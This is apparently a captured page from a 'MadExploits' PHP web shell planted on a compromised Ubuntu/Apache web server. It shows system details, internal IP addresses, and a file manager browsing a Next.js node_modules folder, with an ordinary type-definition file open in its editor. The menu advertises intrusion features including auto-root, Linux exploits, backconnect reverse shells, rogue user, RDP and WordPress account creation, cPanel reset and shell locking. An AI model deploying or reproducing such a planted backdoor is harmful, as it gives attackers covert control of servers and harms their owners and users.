Linux websever 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Apache/2.4.52 (Ubuntu)
: 192.168.3.70 | : 192.168.1.99
Cant Read [ /etc/named.conf ]
8.1.2-1ubuntu2.23
urlab
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
events /
node_modules /
next /
dist /
pages /
[ HOME SHELL ]
Name
Size
Permission
Action
_app.d.ts
959
B
-rw-rw-r--
_app.js
1.45
KB
-rw-rw-r--
_app.js.map
590
B
-rw-rw-r--
_document.d.ts
2.69
KB
-rw-rw-r--
_document.js
37.83
KB
-rw-rw-r--
_document.js.map
23.82
KB
-rw-rw-r--
_error.d.ts
610
B
-rw-rw-r--
_error.js
4.19
KB
-rw-rw-r--
_error.js.map
1.81
KB
-rw-rw-r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : _app.d.ts
import React from 'react'; import type { AppContextType, AppInitialProps, AppPropsType, NextWebVitalsMetric, AppType } from '../shared/lib/utils'; import type { Router } from '../client/router'; export type { AppInitialProps, AppType }; export type { NextWebVitalsMetric }; export type AppContext = AppContextType<Router>; export type AppProps<P = any> = AppPropsType<Router, P>; /** * `App` component is used for initialize of pages. It allows for overwriting and full control of the `page` initialization. * This allows for keeping state between navigation, custom error handling, injecting additional data. */ declare function appGetInitialProps({ Component, ctx, }: AppContext): Promise<AppInitialProps>; export default class App<P = any, CP = {}, S = {}> extends React.Component<P & AppProps<CP>, S> { static origGetInitialProps: typeof appGetInitialProps; static getInitialProps: typeof appGetInitialProps; render(): React.JSX.Element; }
Close